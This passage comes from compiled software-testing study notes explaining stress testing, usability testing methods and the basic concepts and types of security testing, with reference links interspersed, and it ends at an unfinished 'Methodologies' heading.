Stress testing's objective is to check the system under extreme conditions. It monitors system resources such as Memory, processor, network etc, and checks the ability of the system to recover back to normal status. It checks whether system displays appropriate error messages while under stress.

Approach for Stress Testing

The following steps are involved in stress-testing a Web application:

1. Step1 - Identify test objectives. Identify the objectives of stress testing in terms of the desired outcomes of the testing activity.

2. Step 2 - Identify key scenario(s). Identify the application scenario or cases that need to be stress-tested to identify potential problems.

3. Step 3 - Identify the workload. Identify the workload that you want to apply to the scenarios identified during the “Identify objectives” step. This is based on the workload and peak load capacity inputs.

4. Step 4 - Identify metrics. Identify the metrics that you want to collect about the application’s performance. Base these metrics on the potential problems identified for the scenarios you identified during the “Identify objectives” step.

5. Step 5 - Create test cases. Create the test cases in which you define steps for running a single test, as well as your expected results.

6. Step 6 - Simulate load. Use test tools to simulate the required load for each test case and capture the metric data results.

7. Step 7 - Analyze results. Analyze the metric data captured during the test.

These steps are graphically represented below; the following sections discuss each step in detail.

Figure 18.1 Stress Testing Steps

Step 1 - Identify Test Objectives

Asking yourself or others the following questions can help in identifying the desired outcomes of your stress testing:

1. Is the purpose of the test to identify the ways the system can possibly fail catastrophically in production?

2. Is it to provide information to the team in order to build defenses against catastrophic failures?

3. Is it to identify how the application behaves when system resources such as memory, disk space, network bandwidth, or processor cycles are depleted?

4. Is it to ensure that functionality does not break under stress? For example, there may be cases where operational performance metrics meet the objectives, but the functionality of the application is failing to meet them — orders are not inserted in the database, the application is not returning the complete product information in searches, form controls are not being populated properly, redirects to custom error pages are occurring during the stress testing, and so on.

Step 2 - Identify Key Scenario(s)

To get the most value out of a stress test, the test needs to focus on the behavior of the usage scenario or scenarios that matter most to the overall success of the application. To identify these scenarios, you generally start by defining a single scenario that you want to stress-test in order to identify a potential performance issue. Consider these guidelines when choosing appropriate scenarios:

• Select scenarios based on how critical they are to overall application performance.

• Try to test those operations that are most likely to affect performance. These might include operations that perform intensive locking and synchronization, long transactions, and disk-intensive input/output (I/O) operations.

• Base your scenario selection on the specific areas of your application identified as potential bottlenecks by load-testing data. Although you should have fine-tuned and removed the bottlenecks after load testing, you should still stress-test the system in these areas to verify how well your changes handle extreme stress levels.

Examples of scenarios that may need to be stress tested separately from other usage scenarios for a typical e-commerce application include the following:

• An order-processing scenario that updates the inventory for a particular product. This functionality has the potential to exhibit locking and synchronization problems.

• A scenario that pages through search results based on user queries. If a user specifies a particularly wide query, there could be a large impact on memory utilization. For example, memory utilization could be affected if a query returns an entire data table.

Step 3 - Identify the Workload

The load you apply to a particular scenario should stress the system sufficiently beyond threshold limits to enable you to observe the consequences of the stress condition. One method to determine the load at which an application begins to exhibit signs of stress is to incrementally increase the load and observe the application behavior under various load conditions. The key is to systematically test with various workloads until you create a significant failure. These variations may be accomplished by adding more users, reducing delay times, adding or reducing the number and type of user activities represented, or adjusting test data.

For example, a stress test could be designed to simulate every registered user of the application attempting to log on during one 30-second period. This would simulate a situation where the application suddenly became available again after a period of downtime and all users were anxiously refreshing their browsers, waiting for the application to come back online. Although this situation does not occur frequently in the

real world, it does happen often enough for there to be real value in learning how the application will respond if it does.

Remember to represent the workload with accurate and realistic test data — type and volume, different user logins, product IDs, product categories, and so on — allowing you to simulate important failures such as deadlocks or resource consumption.

The following activities are generally useful in identifying appropriate workloads for stress testing:

• Identify the distribution of work. For each key scenario, identify the distribution of work to be simulated. The distribution is based on the number and type of users executing the scenario during the stress test.

• Estimate peak user loads. Identify the maximum expected number of users during peak load conditions for the application. Using the work distribution you identified for each scenario, calculate the percentage of user load per key scenario.

• Identify the anti-profile. As an alternative, you can start by applying an anti-profile to the normal workload. In an anti-profile, the workload distributions are inverted for the scenario under consideration. For example, if the normal load for the order-processing scenario is 10 percent of the total workload, the anti-profile would be 90 percent of the total workload. The remaining load can be distributed among the other scenarios. Using an anti-profile can serve as a valuable starting point for your stress tests because it ensures that the critical scenarios are subjected to loads beyond the normal load conditions.

Step 4 - Identify Metrics

When identified and captured correctly, metrics provide information about how well or poorly your application is performing as compared to your performance objectives. In addition, metrics can help you identify problem areas and bottlenecks within your application.

Using the desired performance characteristics identified during the “Identify objectives” step, identify metrics to be captured that focus on potential pitfalls for each scenario. The metrics can be related to both performance and throughput goals as well as providing information about potential problems; for example, custom performance counters that have been embedded in the application.

When identifying metrics, you will use either direct objectives or indicators that are directly or indirectly related to those objectives. The following table describes performance metrics in terms of related performance objectives.

Step 5 - Create Test Cases

Identifying workload profiles and key scenarios generally does not provide all of the information necessary to implement and execute test cases. Additional inputs for completely designing a stress test include performance objectives, workload characteristics, test data, test environments, and identified metrics. Each test design should mention the expected results and/or the key data of interest to be collected, in such a way that each test case can be marked as a “pass,” “fail,” or “inconclusive” after execution.

The following is an example of a test case based on the order-placement scenario.

Test 1 – Place Order Scenario

• Workload: 1,000 simultaneous users. • Think time: Use a random think time between 1 and 10 seconds in the test script

after each operation. • Test Duration: Run the test for two days.

Expected results:

• Application hosting process should not recycle because of deadlock or memory consumption.

• Throughput should not fall below 35 requests per second. • Response time should not be greater than 7 seconds for 95 percent of total

transactions completed. • “Server busy” errors should not be more than 10 percent of the total response

because of contention-related issues. • Order transactions should not fail during test execution. Database entries should

match the “Transactions succeeded” count.

Step 6 - Simulate Load

After you have completed the previous steps to an appropriate degree, you should be ready to simulate the load executing the stress test. Typically, test execution follows these steps:

1. Validate that the test environment matches the configuration that you were expecting and/or designed your test for.

2. Ensure that both the test and the test environment are correctly configured for metrics collection.

3. Before running the test, execute a quick “smoke test” to make sure that the test script and remote performance counters are working correctly.

4. Reset the system (unless your scenario is to do otherwise) and start a formal test execution.

Note: Make sure that the client (a.k.a. load generator) computers that you use to generate load are not overly stressed. Utilization of resources such as processor and memory should remain low enough to ensure that the load-generation environment is not itself a bottleneck.

Step 7 - Analyze Results

Analyze the captured data and compare the results against the metric’s accepted level. If the results indicate that your required performance levels have not been attained,

analyze and fix the cause of the bottleneck. To address observed issues, you might need to do one or more of the following:

• Perform a design review. • Perform a code review. • Run stress tests in environments where it is possible to debug possible causes of

failures, during test execution.

In situations where performance issues are observed, but only under conditions that are deemed to be unlikely enough to warrant tuning at the current time, you may want to consider conducting additional tests to identify an early indicator for the issue in order to avoid unwanted surprises.

Usage Scenarios for Stress Testing

The following are examples of how stress testing is applied in practice:

• Application stress testing. This type of test typically focuses on more than one transaction on the system under stress, without the isolation of components. With application stress testing, you are likely to uncover defects related to data locking and blocking, network congestion, and performance bottlenecks on different components or methods across the entire application. Because the test scope is a single application, it is common to use this type of stress testing after a robust application load-testing effort, or as a last test phase for capacity planning. It is also common to find defects related to race conditions and general memory leaks from shared code or components.

• Transactional stress testing. Transactional stress tests aim at working at a transactional level with load volumes that go beyond those of the anticipated production operations. These tests are focused on validating behavior under stressful conditions, such as high load with same resource constraints, when testing the entire application. Because the test isolates an individual transaction, or group of transactions, it allows for a very specific understanding of throughput capacities and other characteristics for individual components without the added complication of inter-component interactions that occurs in testing at the application level. These tests are useful for tuning, optimizing, and finding error conditions at the specific component level.

• Systemic stress testing. In this type of test, stress or extreme load conditions are generated across multiple applications running on the same system, thereby pushing the boundaries of the applications’ expected capabilities to an extreme. The goal of systemic stress testing is to uncover defects in situations where different applications block one another and compete for system resources such as memory, processor cycles, disk space, and network bandwidth. This type of testing is also known as integration stress testing or consolidation stress testing. In large-scale systemic stress tests, you stress all of the applications together in the same consolidated environment. Some organizations choose to perform this

type of testing in a larger test lab facility, sometimes with the hardware or software vendor’s assistance.

Exploratory Stress Testing

Exploratory stress testing is an approach to subjecting a system, application, or component to a set of unusual parameters or conditions that are unlikely to occur in the real world but are nevertheless possible. In general, exploratory testing can be viewed as an interactive process of simultaneous learning, test design, and test execution. Most often, exploratory stress tests are designed by modifying existing tests and/or working with application/system administrators to create unlikely but possible conditions in the system. This type of stress testing is seldom conducted in isolation because it is typically conducted to determine if more systematic stress testing is called for related to a particular failure mode. The following are some examples of exploratory stress tests to determine the answer to “How will the system respond if…?”

• All of the users logged on at the same time. • The load balancer suddenly failed. • All of the servers started their scheduled virus scan at the same time during a

period of peak load. • The database went offline during peak usage.

Load test vs. stress test

Stress testing tries to break the system under test by overwhelming its resources or by taking resources away from it (in which case it is sometimes called negative testing). The main purpose of this process is to make sure that the system fails and recovers gracefully—a quality known as recoverability.

Load testing implies a controlled environment moving from low loads to high. Stress testing focuses on more random events, chaos and unpredictability. Using a web application as an example here are ways stress might be introduced:

• double the baseline number for concurrent users/HTTP connections • randomly shut down and restart ports on the network switches/routers that

connect the servers (via SNMP commands for example) • take the database offline, then restart it • rebuild a RAID array while the system is running • run processes that consume resources (CPU, memory, disk, network) on the

Web and database servers • observe how the system reacts to failure and recovers

o Does it save its state? o Does the application hang and freeze or does it fail gracefully? o On restart, is it able to recover from the last good state?

o Does the system output meaningful error messages to the user and to the logs?

o Is the security of the system compromised because of unexpected failures?

Usability testing

DEFINITION

Usability Testing is a type of testing done from an end-user’s perspective to determine if the system is easily usable.

ISTQB’s Definition

usability testing: Testing to determine the extent to which the software product is understood, easy to learn, easy to operate and attractive to the users under specified conditions.

CSTE CBOK Definition

Usability Test: The purpose of this event is to review the application user interface and other human factors of the application with the people who will be using the application. This is to ensure that the design (layout and sequence, etc.) enables the business functions to be executed as easily and intuitively as possible.

Usability testing is a technique used in user-centered interaction design to evaluate a product by testing it on users. This can be seen as an irreplaceable usability practice, since it gives direct input on how real users use the system.[1] This is in contrast with

http://en.wikipedia.org/wiki/User-centered_design

http://en.wikipedia.org/wiki/Interaction_design

http://en.wikipedia.org/wiki/Usability

http://en.wikipedia.org/wiki/Usability_testing%23cite_note-1

usability inspection methods where experts use different methods to evaluate a user interface without involving users.

The primary focus is on:

1. Ease of use 2. Ease of Learning or familiarizing with the system 3. Satisfaction of the user with the entire experience

Usability testing focuses on measuring a human-made product's capacity to meet its intended purpose. Examples of products that commonly benefit from usability testing

http://en.wikipedia.org/wiki/Usability_inspection

are foods, consumer products, web sites or web applications, computer interfaces, documents, and devices. Usability testing measures the usability, or ease of use, of a specific object or set of objects, whereas general human-computer interaction studies attempt to formulate universal principles.

• In usability testing basically the testers tests the ease with which the user interfaces can be used. It tests that whether the application or the product built is user-friendly or not.

• Usability Testing is a black box testing technique. • Usability testing also reveals whether users feel comfortable with your application

or Web site according to different parameters - the flow, navigation and layout, speed and content - especially in comparison to prior or similar applications.

• Usability Testing tests the following features of the software.

– How easy it is to use the software. – How easy it is to learn the software. – How convenient is the software to end user.

Usability testing includes the following five components:

1. Learnability: How easy is it for users to accomplish basic tasks the first time they encounter the design? How easy is it for users to accomplish basic tasks the first time they encounter the design?

2. Efficiency: How fast can experienced users accomplish tasks? Once users have learned the design, how quickly can they perform tasks?

3. Memorability: When users return to the design after a period of not using it, does the user remember enough to use it effectively the next time, or does the user have to start over again learning everything? When users return to the design after a period of not using it, how easily can they reestablish proficiency?

4. Errors: How many errors do users make, how severe are these errors and how easily can they recover from the errors? How many errors do users make, how severe are these errors, and how easily can they recover from the errors?

5. Satisfaction: How much does the user like using the system? How pleasant is it to use the design?

Benefits of Usability Testing

Usability testing lets the design and development teams identify problems before they are coded. The earlier issues are identified and fixed, the less expensive the fixes will be in terms of both staff time and possible impact to the schedule. During a usability test, you will:

• Learn if participants are able to complete specified tasks successfully and • Identify how long it takes to complete specified tasks • Find out how satisfied participants are with your Web site or other product • Identify changes required to improve user performance and satisfaction

http://en.wikipedia.org/wiki/Food

http://en.wikipedia.org/wiki/Web_design

http://en.wikipedia.org/wiki/User_interface

http://en.wikipedia.org/wiki/Human-computer_interaction

http://istqbexamcertification.com/what-is-black-box-specification-based-also-known-as-behavioral-testing-techniques/

• And analyze the performance to see if it meets your usability objectives

Benefits of usability testing to the end user or the customer:

– Better quality software – Software is easier to use – Software is more readily accepted by users – Shortens the learning curve for new users

What is Usability Testing ?

Usability testing, a non-functional testing technique that is a measure of how easily the system can be used by end users. It is difficult to evaluate and measure but can be evaluated based on the below parameters:

• Level of Skill required to learn/use the software. It should maintain the balance for both novice and expert user.

• Time required to get used to in using the software. • The measure of increase in user productivity if any. • Assessment of a user's attitude towards using the software.

Usability Testing Process:

Usability testing is a very wide area of testing and it needs fairly high level of understanding of this field along with creative mind. People involved in the usability testing are required to possess skills like patience, ability to listen to the suggestions,

openness to welcome any idea, and the most important of them all is that they should have good observation skills to spot and fix the issues or problems.

Usability Testing

Usability testing refers to evaluating a product or service by testing it with representative users. Typically, during a test, participants will try to complete typical tasks while observers watch, listen and takes notes. The goal is to identify any usability problems, collect qualitative and quantitative data and determine the participant's satisfaction with the product.

To run an effective usability test, you need to develop a solid test plan, recruit participants , and then analyze and report your findings.

Consider these elements when budgeting for usability testing:

• Time: You will need time to plan the usability test. It will take the usability specialist and the team time to become familiar with the site and pilot test the test scenarios. Be sure to budget in time for this test prep as well as running tests, analyzing the data, writing the report, and presenting the findings.

• Recruiting Costs: Consider how or where you will recruit your participants. You will either need to allow for staff time to recruit or engage a recruiting firm to schedule participants for you based on the requirements.

• Participant Compensation: If you will be compensating participants for their time or travel, factor that into your testing budget.

• Rental Costs: If you do not have monitoring or recording equipment, you will need to budget for rental costs for the lab or other equipment. You may also need to secure a location for testing, a conference room for example, so consider this as well.

It’s important to keep in mind that usability testing is not just a milestone to be checked off on the project schedule. The team should have a goal for why they are testing and then implement the results.

Why is usability testing performed?

Web and mobile applications rule the business world in recent times. These apps being efficient, effective, easy, simple, appealing, engaging etc. is very critical for them to be embraced by the customers. Usability testing is all about determining if a site is what the user would want to use and come back to or not.

This not only applies to software systems. Any machine/interface that has a human interaction has got to satisfy these rules. How, you ask? Democracy would suffer if the voting machines were not usable. I wouldn’t vote if I had to click more than one button to choose my candidate, would you? Exactly!

http://www.usability.gov/how-to-and-tools/methods/running-usability-tests.html

http://www.usability.gov/how-to-and-tools/methods/planning-usability-testing.html

http://www.usability.gov/how-to-and-tools/methods/recruiting-usability-test-participants.html



http://www.usability.gov/how-to-and-tools/methods/reporting-usability-test-results.html

For a more software specific example, check out this 300 million dollar article by Jared Spool that will clearly explain how the placement of a button has caused the business to be impacted.

When is Usability Testing conducted?

As testers we know that the earlier a defect is found in the SDLC the cheaper it is to fix it. The same concept holds true for Usability Testing also.

Usability testing results effect the design of the product. So, ideally, usability testing should start at the design level. But that is not all; software undergoes many changes/interpretations/implementations throughout the SDLC process. To make sure that we do not make usability related mistakes at any of these steps – usability testing should be conducted often and continuously for maximum results.

Who performs usability testing?

It can be done as an internal process, when the designers, developers and anyone else can sit down and analyze their system and get the results. Based on these results, the design and/or code can be modified to be in accordance with the changes they all agree on.

A more advanced approach is to hire real time users and give them particular tasks. A facilitator/s can devise these tasks and get the results from the users.

The users can then provide information, on whether:

1. the task was successful or not 2. the task could be performed easily 3. Was the experience interesting, engaging or annoying – their feeling towards the

software

Key Benefits of Usability Testing:

• Decrease development and redesign cost which increases user satisfaction. • Help to determine the real requirements and tasks of the user before time in the

design process. • Analysis of your website design’s strengths and weaknesses. • Limit graphics with functions of design. • User productivity increases, cost decreases. • Increase business due to satisfied customers. • Reduces user acclimation time and errors. • Provide better quality software to the end user or the customer. • Software will be easy to understand and use by end user or the customer. • Software is more gladly accepted by users. • Shorten the learning curve for new users.

http://www.uie.com/articles/three_hund_million_button/

http://www.softwaretestinghelp.com/how-to-find-a-bug-in-application-tips-and-tricks/

Advantages of Usability Testing:

• Usability testing finds important bugs and potholes of the tested application which will be not visible to the developer.

• Using correct resources, usability test can assist in fixing all problems that user face before application releases.

• Usability test can be modified according to the requirement to support other types of testing such as functional testing, system integration testing, Unit testing, smoke testing etc.

• Planned Usability testing becomes very economic, highly successful and beneficial.

• Issues and potential problems are highlighted before the product is launched. • It helps uncover usability issues before the product is marketed. • It helps improve end user satisfaction • It makes your system highly effective and efficient • It helps gather true feedback from your target audience who actually use your

system during usability test. You do not need to rely on "opinions" from random people.

• Usability test can be modified to cover many other types of testing such as functional testing, system integration testing, unit testing, smoke testing etc.

• Usability testing can be very economical if planned properly, yet highly effective and beneficial.

• If proper resources (experienced and creative testers) are used, usability test can help in fixing all the problems that user may face even before the system is finally released to the user. This may result in better performance and a standard system.

• Usability testing can help in discovering potential bugs and potholes in the system which generally are not visible to developers and even escape the other type of testing.

Limitations of usability testing:

Planning and data-collecting process are time consuming. It is always be confusing that why usability problems come. Its small and simple size makes it unreliable for drawing conclusions about subjective user preferences. It’s hard to create the suitable context. You can’t test long-term experiences. Unplanned social connections cannot be replicated. People act in a different way when they know they’re being observed.

Cost is a major consideration in usability testing. It takes lots of resources to set up a Usability Test Lab. Recruiting and management of usability testers can also be expensive

http://istqbexamcertification.com/what-is-functional-testing-testing-of-functions-in-software/

http://istqbexamcertification.com/what-is-system-integration-testing/

http://istqbexamcertification.com/what-is-unit-testing/

Goals of Usability Testing

Goal of this testing is to satisfy users and it mainly concentrates on the following parameters of a system:

Effectiveness of the system

• Is the system is easy to learn? • Is the system useful and adds value to the target audience? • Is Content, Color, Icons, Images used are aesthetically pleasing ?

Efficiency

• Navigation required to reach desired screen/webpage should be very less. Scroll bars shouldn't be used frequently.

• Uniformity in the format of screen/pages in your application/website. • Provision to search within your software application or website

Accuracy

• No outdated or incorrect data like contact information/address should be present. • No broken links should be present.

User Friendliness

• Controls used should be self-explanatory and must not require training to operate • Help should be provided for the users to understand the application / website • Alignment with above goals helps in effective usability testing

Usability Testing Process

Usability testing process consists of the following phases

Planning:- During this phase the goals of usability test are determined. Having volunteers sit in front of your application and recording their actions is not a goal. You need to determine critical functionalities and objectives of system. You need to assign tasks to your testers, which exercise these critical functionalities. During this phase ,

usability testing method, number & demographics of usability testers , test report formats are also determined

Recruiting: During this phase, you recruit the desired number of testers as per your usability test plan. Finding testers who match your demographic (age , sex etc ) and professional ( education , job etc .) profile can take time.

Usability Testing: During this phase, usability tests are actually executed.

Data Analysis: Data from usability tests is thoroughly analyzed to derive meaningful inferences and give actionable recommendations to improve overall usability of your product.

Reporting: Findings of the usability test is shared with all concerned stakeholders which can include designer, developer, client, and CEO

Methods of Usability Testing

There are two methods available to do usability testing -

1. Laboratory Usability Testing 2. Remote Usability Testing

Laboratory Usability Testing:. This testing is conducted in a separate lab room in presence of the observers. The testers are assigned tasks to execute. The role of the observer is to monitor behavior of the testers and report outcome of testing. The observer remains silent during the course of testing. In this testing both observers and testers are present in same physical location.

Remote Usability Testing : Under this testing observers and testers are remotely located. Testers access the System Under Test, remotely and perform assigned tasks. Tester's voice , screen activity , testers facial expressions are recorded by an automated software. Observers analyze this data and report findings of the test.

Categories of Usability Testing

There are 3 main categories of usability testing:

• Explorative: Used early in product development to assess the effectiveness and usability of a preliminary design or prototype, as well as users’ thought processes and conceptual understanding.

• Assessment: Used midway in product development or as an overall usability test for technology evaluation. Evaluates real-time trials of the technology to determine the satisfaction, effectiveness, and overall usability.

http://www.utexas.edu/academic/ctl/assessment/iar/tech/plan/method/use-types.php

• Comparative: Compares two or more instructional technology products or designs and distinguishes the strengths and weaknesses of each.

Types of Usability Testing Methods

The following is a brief description of the main usability testing methods that are used.

Hallway Testing: Using random people to test the website rather than people who are trained and experienced in testing websites. This method is particularly effective for testing a new website for the first time during development. Remote Usability Testing: Testing the usability of a website using people who are located in several countries and time zones. Sometimes remote testing is performed using video conferencing, while other times the user works separately from the evaluator. Nowadays, there are various software available at a relatively low cost that allow remote usability testing to be carried out even by observers who are not usability experts. Typically, the click locations and streams of the users are automatically recorded and any critical incidents that occurred while they were using the site are also recorded, along with any feedback the user has submitted. Remote usability testing allows for the length of time it took each tester to complete various tasks to be recorded. It is a good method of testing because the tests are carried out in the normal environment of the user instead of a controlled lab.

Expert Review: An expert in the field is asked to evaluate the usability of the website. Sometimes the expert is brought to a testing facility to test the site, while other times the tests are conducted remotely and automated results are sent back for review. Automated expert tests are typically not as detailed as other types of usability tests, but their advantage is that they can be completed quickly.

Paper Prototype Testing: Quite simply, this usability testing method involves creating rough, even hand-sketched, drawings of an interface to use as prototypes, or models, of a design. Observing a user undertaking a task using such prototypes enables the testing of design ideas at an extremely low cost and before any coding has been done.

Questionnaires and Interviews: Due to their one-on-one nature, interviews enable the observer to ask direct questions to the users (apart from double checking what they are really doing). Similarly, the observer can also ask questions by means of questionnaires. The advantage of questionnaires is that they allow more structured data collection. However, they are rigid in nature as opposed to interviews.

Usability testing questionnaires are usually handed our after the user has tried completing the given task

Do-it-Yourself Walkthrough: Just as the name implies, in this technique, the observer sets up a usability test situation by creating realistic scenarios. He or she then walks through the work themselves just like a user would. A variation of this technique is the group walkthrough where the observer has multiple attendees performing the walkthrough.

Controlled Experiments: An approach that is similar to scientific experiments typically involving a comparison of two products, with careful statistical balancing in a laboratory. This may be the hardest method to do “in the real world” but due to its scientific nature, it yields very accurate results that can eventually be published

• Automated expert review – Similar to expert reviews, this procedure will provide stability testing by using programs those use good designs and heuristics. The tests conducted this way are quicker and consistent.

The classic process The process that Jeff Rubin and I present in the Handbook of Usability Testing, Second Edition could be used for a formal usability test, but it could also be used for less formal tests that can help you explore ideas and form concepts and designs. The steps are basically the same for either kind of test:

• Develop a test plan • Choose a testing environment • Find and select participants • Prepare test materials • Conduct the sessions • Debrief with participants and observers • Analyze data and observations • Create findings and recommendations

Let’s walk through each of these steps.

Develop a test plan

Sit down with the team and agree on a test objective (something besides “determine whether users can use it”), the questions you’ll use, and characteristics of the people who will be trying out the design. (We call them participants, not subjects.) The plan also usually includes the methods and measures you’ll use to learn the answers to your research questions. It’s entirely possible to complete this discussion in under an hour. Write everything down and pick someone from the team to moderate the test sessions.

Choose a testing environment

Will you use a lab? If not, what’s the setup? Will you record the sessions? Again, the team should decide these things together. It’s good to include these logistics in the test plan.

Find and select participants

Focusing on the behavior you’re interested in observing is easier than trying to select for market segmentation or demographics. If you’re testing a web conferencing service, you want people who hold remote meetings. If you’re testing a hotel reservation process on a web site, you want people who do their own bookings. If you want to test a kiosk for checking people into and out of education programs, you want people who are attending those programs. Make sense? Don’t make recruiting harder than it has to be.

Prepare test materials

You’re going to want some kind of guide or checklist to make sure that the moderator addresses all of the research questions. This doesn’t mean asking the research questions of the participants; it means translating the research questions into task scenarios that represent realistic user goals.

In the test materials, include any specific interview questions you might want to ask, prompts for follow-up questions, as well as closing, debriefing questions that you want to ask each participant.

Conduct the sessions

The moderator is the master of ceremonies during each session. This person sees to the safety and comfort of the participants, manages the team members observing, and handles the data collected.

Though only one person from the team moderates, as many people from the team as possible should observe usability test sessions. If you’re going to do multiple individual sessions, each team member should watch at least two sessions.

Debrief with participants and observers

At the end of each session, be sure to take a step back with the participant and ask, “How’d that go?” Also, invite the trained observers to pass follow-up questions to the moderator or to ask questions themselves. Thank the participant, compensate him or her, and say good-bye.

Now, the team observing should talk briefly about what they saw and what they heard. (This discussion is not about solving design problems, yet.)

Analyze data and write up findings

What you know at the end of a usability test is what you observed: What your team saw and heard. When you look at those observations together, the weight of evidence helps you examine why particular things happened. From that examination, you can can develop theories about the causes of frustrations and problems. After you generate these theories, team members can use their expertise to determine how to fix design problems. Then, you can implement changes and test your theories in another usability test.

What you get

If you follow this process in a linear way, you’ll end up with thorough planning, solid controls, heaps of data, rigorous analysis, and—finally—results. (As well as a lot of documentation.) It can feel like a big deal, and sometimes it should be.

But most real-world usability tests need to be lighter and faster. Some of the best user experience teams do only a few hours of testing every month or so, and they may not even think of it as “usability testing.” They’re “getting input” or “gathering feedback.”

Whatever. As long as it involves observing real people using your design, it’s usability testing.

Someone, something, someplace

Really, all you need for a usability test is someone who is a user of your design (or who acts like a user), something to test (a design in any state of completion), and someplace where the user and the design can meet and you can observe. Someplace can even be remote, depending on the state of the design. You can do all that fancy lab stuff, but you don’t have to.

Once you get into a rhythm of doing user research and usability testing, you’ll learn shortcuts and boil the process down to a few steps that work for you. When we get down to the essential steps in the usability testing process, this is what it tends to look like:

Develop a test plan

In the classic process, a usability test plan can be several pages long. Teams in the swing of doing testing all the time can work with a minimalist structure with one or two lines on the elements of the plan.

Find participants

Again, this is about behavior. The behavior you’re interested in for the study is parents going through the process of getting their kids into college. Just make sure you:

• Know your users • Allow enough time • Learn and be flexible • Remember they’re human • Compensate lavishly

Conduct the sessions

If you’re the moderator, do your best to be impartial and unbiased. Just be present and see what happens. Even the designer can be the moderator so you can step back and see the test as an objective exercise.

Remember that this is not about teaching the participant how to use the interface. Give a task that realistically represents a user goal and let the rest happen. Just listen and watch. (Of course, if the task is something people are doing in real life and they’re

having trouble in the session, show them the correct way to do the task with the current design after you’ve collected your data.)

As the session goes on, ask open-ended questions: Why? How? What?

Debrief with observers and come to consensus about design direction

Talk. Brainstorm. Agree. Unless the design was perfect going into the usability test (and that’s a rare thing) and even if the team has only done one or two sessions, use the observations you made to come up with theories about why things happened for participants the way they did. Make some changes and start the cycle again.

Where do great experience designs come from? Observing users

Getting input from users is great; knowing their requirements is important. Feedback from call centers and people doing support is also helpful in creating and improving designs. Whatever your team might call it—usability testing, design testing, getting feedback—the most effective input for informed design decisions is data about the behavior and performance of people using a design to reach their own goals.

Security testing

DEFINITION

Security Testing is a type of software testing that intends to uncover vulnerabilities of the system and determine that its data and resources are protected from possible intruders.

• It is a type of non-functional testing. • Security testing is basically a type of software testing that’s done to check

whether the application or the product is secured or not. It checks to see if the application is vulnerable to attacks, if anyone hack the system or login to the application without any authorization.

• It is a process to determine that an information system protects data and maintains functionality as intended.

• The security testing is performed to check whether there is any information leakage in the sense by encrypting the application or using wide range of software’s and hardware’s and firewall etc.

• Software security is about making software behave in the presence of a malicious attack.

• The six basic security concepts that need to be covered by security testing are: confidentiality, integrity, authentication, availability, authorization and non-repudiation.

What is Security Testing?

Security testing is a testing technique to determine if an information system protects data and maintains functionality as intended. It also aims at verifying 6 basic principles as listed below:

• Confidentiality • Integrity • Authentication • Authorization • Availability • Non-repudiation

Security Testing - Techniques:

• Injection • Broken Authentication and Session Management • Cross-Site Scripting (XSS) • Insecure Direct Object References


• Security Misconfiguration • Sensitive Data Exposure • Missing Function Level Access Control • Cross-Site Request Forgery (CSRF) • Using Components with Known Vulnerabilities • Unvalidated Redirects and Forwards

FOCUS AREAS

There are four main focus areas to be considered in security testing (Especially for web sites/applications):

• Network security: This involves looking for vulnerabilities in the network infrastructure (resources and policies).

• System software security: This involves assessing weaknesses in the various software (operating system, database system, and other software) the application depends on.

• Client-side application security: This deals with ensuring that the client (browser or any such tool) cannot be manipulated.

• Server-side application security: This involves making sure that the server code and its technologies are robust enough to fend off any intrusion.

Security testing is a process intended to reveal flaws in the security mechanisms of an information system that protect data and maintain functionality as intended. Due to the logical limitations of security testing, passing security testing is not an indication that no flaws exist or that the system adequately satisfies the security requirements.

Typical security requirements may include specific elements of confidentiality, integrity, authentication, availability, authorization and non-repudiation. Actual security requirements tested depend on the security requirements implemented by the system. Security testing as a term has a number of different meanings and can be completed in a number of different ways. As such a Security Taxonomy helps us to understand these different approaches and meanings by providing a base level to work from.

security concepts

Security Testing needs to cover the six basic security concepts: confidentiality, integrity, authentication, authorization, availability and non-repudiation.

Confidentiality

• A security measure which protects against the disclosure of information to parties other than the intended recipient is by no means the only way of ensuring the security.

http://en.wikipedia.org/wiki/Information_system

Integrity

• A measure intended to allow the receiver to determine that the information provided by a system is correct.

• Integrity schemes often use some of the same underlying technologies as confidentiality schemes, but they usually involve adding information to a communication, to form the basis of an algorithmic check, rather than the encoding all of the communication.

Authentication

This might involve confirming the identity of a person, tracing the origins of an artifact, ensuring that a product is what its packaging and labeling claims to be, or assuring that a computer program is a trusted one.

Authorization

• The process of determining that a requester is allowed to receive a service or perform an operation.

• Access control is an example of authorization.

Availability

• Assuring information and communications services will be ready for use when expected.

• Information must be kept available to authorized persons when they need it.

Non-repudiation

• In reference to digital security, nonrepudiation means to ensure that a transferred message has been sent and received by the parties claiming to have sent and received the message. Nonrepudiation is a way to guarantee that the sender of a message cannot later deny having sent the message and that the recipient cannot deny having received the message.

Security Testing ensures, that system and applications in an organization, are free from any loopholes that may cause a big loss. Security testing of any system is about finding all possible loopholes and weaknesses of the system which might result into loss of information at the hands of the employees or outsiders of the Organization.

• The goal of security testing is to identify the threats in the system and measure its potential vulnerabilities. It also helps in detecting all possible security risks in the system and help developers in fixing these problems through coding.

http://en.wikipedia.org/wiki/Access_control

Types of Security Testing:

There are seven main types of security testing as per Open Source Security Testing methodology manual. They are explained as follows:

• Vulnerability Scanning: This is done through automated software to scan a system against known vulnerability signatures.

• Security Scanning: It involves identifying network and system weaknesses, and later provides solutions for reducing these risks. This scanning can be performed for both Manual and Automated scanning.

• Penetration testing: This kind of testing simulates an attack from malicious hacker. This testing involves analysis of a particular system to check for potential vulnerabilities to an external hacking attempt.

• Risk Assessment:This testing involves analysis of security risks observed in the organization. Risks are classified as Low, Medium and High. This testing recommends controls and measures to reduce the risk.

• Security Auditing: This is internal inspection of Applications and Operating systems for security flaws. Audit can also be done via line by line inspection of code

• Ethical hacking: It's hacking an Organization Software systems. Unlike malicious hackers ,who steal for their own gains , the intent is to expose security flaws in the system.

• Posture Assessment: This combines Security scanning, Ethical Hacking and Risk Assessments to show an overall security posture of an organization.

http://www.guru99.com/ethical-hacking-tutorials.html

Integration of security processes with the SDLC:

It is always agreed, that cost will be more ,if we postpone security testing after software implementation phase or after deployment. So, it is necessary to involve security testing in SDLC life cycle in the earlier phases.

Let's look into the corresponding Security processes to be adopted for every phase in SDLC

Test plan should include

• Security related test cases or scenarios • Test Data related to security testing • Test Tools required for security testing • Analysis on various tests outputs from different security tools

Sample Test Scenarios for Security Testing:

Sample Test scenarios to give you a glimpse of security test cases -

• Password should be in encrypted format • Application or System should not allow invalid users • Check cookies and session time for application • For financial sites, Browser back button should not work.

Methodologies

In security testing, different methodologies are followed, and they are as follows:

